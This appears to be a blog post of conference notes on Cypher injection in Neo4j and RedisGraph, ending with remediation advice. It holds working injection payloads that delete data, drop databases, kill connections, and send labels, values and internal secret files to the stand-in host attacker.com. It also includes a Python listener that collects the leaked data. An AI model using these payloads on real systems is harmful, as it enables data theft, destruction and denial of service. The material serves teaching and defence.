Conference notes: Cypher Query Injection - the new “SQL Injection”

Posted in Conference notes on November 29, 2022

Hi! This week’s conf’notes are from ‘Cypher Query Injection - the new “SQL Injection” we aren’t aware of’ by Noy Pearl at BSides TLV and BSides Orlando.

TL;DR

This is an excellent introduction to Cypher injection in graph databases like Neo4j. Noy Pearl breaks down everything from the basics to advanced exploitation, sharing her own research and a playground for practice.

Intro to Cypher & Graph Databases

What is Cypher?

Cypher is short for (Open) Cypher Query Language
It’s commonly used in Graph databases

Comments

Cypher is Neo4j’s graph query language that lets you retrieve data from the graph. It’s like SQL for graphs.
It was originally intended to be used with Neo4j, but was opened up through the openCypher project. It is now used by many other databases including RedisGraph, Spark, Amazon Neptune and SAP HANA Graph.
Cypher Query Language Reference, Version 9

What is a Graph database?

	Relational database	Graph database
Vendor examples	MySQL, Microsoft SQL Server	Neo4j, RedisGraph, Amazon Neptune
What it looks like	Tables, rows, columns	Graphs, nodes, relationships

Graph example:

What is a Cypher Query?

Terms:

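Node, Relationship & Node: a pattern is written as (node)-[relationship]->(node).

Variable, Label & Property: in (c:Character {name: 'Spongebob'}), c is the variable, Character is the label and name is a property.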

Query example:

MATCH and RETURN are the equivalent of SELECT FROM in SQL
Get all Characters:

MATCH (c:Character) RETURN c

Get Character by name:

MATCH (c:Character)
WHERE c.name = 'Spongebob'
RETURN c

Cypher injection

Basic SQL injection

Vulnerable query

SELECT * FROM "characters" WHERE name = "Spongebob"

returns only the row whose name is Spongebob.

Injection
If name is based on user input, injecting Spongebob" OR 1=1-- will change the query to:

SELECT * FROM "characters" WHERE name = "Spongebob" OR 1=1--"

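It’ll return every row in the table, because OR 1=1 makes the condition always true and -- comments out the trailing quote.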
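The same injection can be reproduced locally with Python's built-in sqlite3 module. This is only a minimal sketch: the table contents, the helper names find_character_unsafe and make_demo_db, and the single-quoted string literals (instead of the double quotes shown in the query above) are assumptions made for illustration.

```python
import sqlite3


def find_character_unsafe(conn, name):
    # Vulnerable on purpose: user input is concatenated into the SQL string.
    query = "SELECT name FROM characters WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


def make_demo_db():
    # Hypothetical in-memory table standing in for the "characters" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE characters (name TEXT)")
    conn.executemany(
        "INSERT INTO characters (name) VALUES (?)",
        [("Spongebob",), ("Patrick",), ("Squidward",)],
    )
    return conn


conn = make_demo_db()
normal = find_character_unsafe(conn, "Spongebob")
injected = find_character_unsafe(conn, "Spongebob' OR 1=1--")
print(normal)
print(sorted(injected))
```

The first call matches a single row, while the second matches every row because the injected OR 1=1 is evaluated as part of the WHERE clause.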

Basic Cypher injections

MATCH By Name - Vulnerable query

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c

// E.g. return the node that has the name Spongebob:
MATCH (c:Character)
WHERE c.name = 'Spongebob' RETURN c

MATCH By Name injection - Return all
Injecting Spongebob' or 1=1 RETURN c// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' or 1=1 RETURN c//' RETURN c

which returns all nodes.

This is the equivalent of the previous SQL injection example.
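To see why the payload works, it can help to build the query string the way a vulnerable application would. The sketch below is an assumption about how such an application concatenates input (build_query and strip_line_comments are hypothetical helpers), and the comment stripping is deliberately naive.

```python
def build_query(user_input):
    # Vulnerable on purpose: mirrors the concatenated query shown above.
    return "MATCH (c:Character)\nWHERE c.name = '" + user_input + "' RETURN c"


def strip_line_comments(query):
    # Naive: drops everything after "//" on each line and ignores the case
    # where "//" appears inside a quoted string.
    lines = query.split("\n")
    return "\n".join(line.split("//", 1)[0].rstrip() for line in lines)


benign = build_query("Spongebob")
injected = build_query("Spongebob' or 1=1 RETURN c//")
effective = strip_line_comments(injected)
print(effective)
```

Once the comment is removed, the effective query ends with the attacker's own RETURN c, and the original closing quote and RETURN clause are ignored.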

Problem
In order to inject RETURN c, we need to know there is a variable called c (more on that in a sec).

MATCH By Name injection - Delete node
Vulnerable query:

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c

Injecting Spongebob' DELETE c// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' DELETE c//' RETURN c

which deletes the node.

MATCH By Name injection - Delete everything
Vulnerable query:

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c

Injecting Spongebob' MATCH (all:Character) DELETE all// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob'
MATCH (all:Character)
DELETE all//'
RETURN c

We inserted two clauses (MATCH & DELETE). This creates a variable called all to get all the nodes that have a label called Character, then deletes them.

Problem
In blackbox testing, we can’t see the query. So we don’t know that there is a label Character.
The solution is to leak this data by leveraging a legitimate Neo4j functionality called LOAD CSV:

Data exfiltration via LOAD CSV in Neo4j

We’re basically trying to exploit a blind Cypher injection, which is when we’re able to inject into a query but don’t see the reply

LOAD CSV

Used to import data from CSV files (possibly from external files)
Syntax: LOAD CSV FROM 'https://your-website/data.csv' AS row
Interesting because it sends a GET request to an external service (that we can define)
So it enables leaking data from the database to a server we control

Using LOAD CSV to leak Labels

Payload to leak all labels:

CALL db.labels() YIELD label
LOAD CSV FROM 'https://attacker.com/'+label
AS b RETURN b//

What this does:

Calls the procedure db.labels() which returns all labels in the database
Uses LOAD CSV & appends the label at the end of the URL. This sends a GET request to our server with the leaked label in the path (one request sent for each label):

Notice the User-Agent is NeoLoadCSV_Java.
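On the receiving end, any HTTP server that logs request paths is enough to collect the leaked values. The following is a minimal sketch using Python's standard library; the names record_leak, LeakHandler and serve, the port, and the "ok" response body are all assumptions, not part of the talk.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

leaked_values = []


def record_leak(request_path):
    # The injected payload appends the leaked value to the URL path,
    # so the value is whatever follows the leading "/".
    value = unquote(urlsplit(request_path).path.lstrip("/"))
    leaked_values.append(value)
    return value


class LeakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        record_leak(self.path)
        body = b"ok\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/csv")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        # Silence the default per-request logging.
        pass


def serve(port=8000):
    # Blocks until interrupted; the port is an arbitrary choice.
    HTTPServer(("0.0.0.0", port), LeakHandler).serve_forever()
```

Calling serve() on a host reachable from the database server would add one entry to leaked_values per incoming request, which matches the one-request-per-label behaviour described above.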

Using LOAD CSV to leak Properties

We know there is a label called Character.
Payload to leak its properties:

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+apoc.text.join(keys(c), '')
AS b RETURN b//

What this does:

Uses keys() to return all properties of nodes that have a label Character
Uses apoc.text.join to transform the list into a string (so we can append it at the end of the URL)
Uses LOAD CSV to send the joined property names to your server (one GET request is sent per matched node)

Using LOAD CSV to leak Values of a Property

We know there is a label called Character & a property called name.
Payload to leak the names (i.e. values of the property name):

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+c.name
AS b RETURN b//

Attack escalation

Denial of Service - Preventing access to the database

Leak & Kill connections

Call dbms.listConnections() to get all connection IDs:

CALL dbms.listConnections()

Use LOAD CSV to leak them to your server
Kill the connection with dbms.killConnection:

CALL dbms.killConnection("bolt-9276")

Or kill a list of connections with dbms.killConnections:

CALL dbms.killConnections(["bolt-9276", "bolt-9273"])

Impact:

We’re killing the connections between the server and the database (it’s not a client-side attack).
So using an automated script, we could prevent queries of legitimate users from being executed, leading to DoS.
But it’ll depend on the role & permissions you have when injecting. If your role is admin, you’ll be able to perform this DoS attack with a simple injection with LOAD CSV.

Drop database

List all databases:

SHOW DATABASES

Use LOAD CSV to leak their names to your server
Drop databases:

DROP DATABASE spongebob

SSRF & RFI - Accessing sensitive endpoints & files

Leveraging LOAD CSV for SSRF

Cypher injection can be exploited for SSRF
By injecting LOAD CSV FROM <url-of-internal-server>, you can make the vulnerable server send requests to internal servers and access hidden endpoints, enumerate directories and files, leak data to your server, etc

Lateral movement in the cloud

Use LOAD CSV FROM to query the AWS metadata service to find out to which other machine(s) you can escalate your attack
If you can query AWS Secrets Manager, you can also retrieve a lot of sensitive files and passwords from it
But this only works in IMDSv1
IMDSv2 requires passing a session token via the HTTP request header X-aws-ec2-metadata-token, to allow queries to the AWS metadata service. Noy didn’t find a way to include this token in GET requests sent by LOAD CSV FROM.
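The difference between the two versions is easier to see when the IMDSv2 requests are written out. This sketch only builds the requests with Python's urllib and does not send them; it follows the documented IMDSv2 flow (a PUT to obtain a token, then a GET carrying that token), and the function names and default path are assumptions.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def build_token_request(ttl_seconds=21600):
    # Step 1 of IMDSv2: a PUT request that asks for a session token.
    return urllib.request.Request(
        IMDS + "/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(token, path="/latest/meta-data/"):
    # Step 2: a GET request that must carry the token in a header.
    return urllib.request.Request(
        IMDS + path,
        method="GET",
        headers={"X-aws-ec2-metadata-token": token},
    )


token_req = build_token_request()
data_req = build_metadata_request("TOKEN")
print(token_req.get_method(), token_req.full_url)
print(data_req.get_method(), data_req.full_url)
```

LOAD CSV FROM only issues a plain GET, so it can neither perform the PUT in step 1 nor attach the header required in step 2.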

Leak secrets through SSRF

Let’s say there is an internal endpoint that hosts a sensitive file:

Cypher injection can be exploited to leak the secret in this file:

LOAD CSV FROM "http://localhost:3030/internal-api/keys.txt"
AS secret
LOAD CSV FROM "http://attacker.com/"+secret[0]
AS LINE RETURN secret[0]//

What this does:

The first LOAD CSV FROM gets the secret file from the other server, and saves it as secret
The second LOAD CSV FROM sends a request to our server, with the secret appended at the end

Note that:

This works even if the Neo4j database and the sensitive file are hosted on different servers
The filetype doesn’t matter (it doesn’t have to be CSV)

Responsible disclosure to Neo4j

Noy alerted Neo4j about the risks of LOAD CSV, which is always available because there is no way to disable it.
They’re working on a solution, but it’s not simple: LOAD CSV is defined as a clause, not a function, and clauses cannot be disabled (whereas functions can).

Alternative to LOAD CSV

Neo4j APOC Library extends the functionality and Cypher language of Neo4j databases
It provides more features including procedures to Import / Load and Export data
If LOAD CSV is blocked, apoc.load.json can be used to leak the same information:

MATCH (c:Character)
CALL apoc.load.json("https://attacker.com/data.json?leaked="+c.name)
YIELD value RETURN value//

This requires that APOC is installed in the database. Chances are it will be, since APOC is considered the largest and most common Neo4j library.

Remediation & Mitigation

Remediation

Use Parameterized Queries

// Not vulnerable (parameterized query)
session.run("MATCH (c:Character) WHERE c.name = $name RETURN c", {name: name})

// Vulnerable (user input concatenated into the Cypher query)
session.run("MATCH (c:Character) WHERE c.name = '" + name + "' RETURN c")
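The same idea in Python, as a minimal sketch: the query text stays constant and the user input only travels in the parameters dictionary. RecordingSession is a hypothetical stand-in used to inspect what would be sent; with the official neo4j Python driver, a real session's run method accepts a query and a parameters dictionary in the same way.

```python
QUERY = "MATCH (c:Character) WHERE c.name = $name RETURN c"


def find_character(session, name):
    # The query text is constant; user input only travels as a parameter.
    return session.run(QUERY, {"name": name})


class RecordingSession:
    # Hypothetical stand-in for a driver session, used only to inspect
    # what would be sent to the database.
    def __init__(self):
        self.calls = []

    def run(self, query, parameters=None):
        self.calls.append((query, parameters))
        return []


session = RecordingSession()
find_character(session, "Spongebob' or 1=1 RETURN c//")
sent_query, sent_params = session.calls[0]
print(sent_query)
print(sent_params)
```

Even with the injection payload as input, the query string is unchanged, so the database treats the payload as a literal name to compare against.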

Mitigations

Neo4j supports RBAC - users, roles & privileges
- Read / write
- Built-in granular roles - PUBLIC, reader, editor, publisher, … admin
- Revoke privileges from roles
- Hardening capabilities per-user
Disable/blocklist APOC procedures (like LOAD, IMPORT, EXPORT…) in neo4j.conf (since version 4.3)
Uninstall APOC if it’s not used

RedisGraph

Extension to Redis that enables writing Cypher queries
Supports some procedures (e.g. db.labels)
Supports substrings
No equivalent of LOAD CSV, but CASE WHEN can be used for Cypher injection (if-based, with OR 1=2)
- E.g. get labels with db.labels and check whether the first letter equals ‘a’ (using OR 1=2 to get the result if it’s a blind injection)
Supports parameterized queries
Doesn’t support RBAC
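The if-based approach amounts to recovering a value one character at a time from yes/no answers. Here is a minimal sketch of that loop; the oracle callback is hypothetical (in a real test it would send a CASE WHEN payload and observe whether the response changes), and fake_oracle_for exists only to make the example self-contained.

```python
import string

DEFAULT_ALPHABET = string.ascii_letters + string.digits + "_"


def extract_string(oracle, alphabet=DEFAULT_ALPHABET, max_len=64):
    # Ask "is the character at this position equal to X?" for each
    # candidate, and stop at the first position where nothing matches.
    recovered = ""
    for position in range(max_len):
        for candidate in alphabet:
            if oracle(position, candidate):
                recovered += candidate
                break
        else:
            return recovered
    return recovered


def fake_oracle_for(secret):
    # Simulates the true/false signal a blind injection would provide.
    def oracle(position, candidate):
        return position < len(secret) and secret[position] == candidate

    return oracle


label = extract_string(fake_oracle_for("Character"))
print(label)
```

Each oracle call corresponds to one injected request, so the number of requests grows with the alphabet size times the length of the value.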

What now

Practice: cypher-playground
Fix existing injections in your apps & reduce attack surface
Hunt for Cypher injection on bug bounty programs

Resources
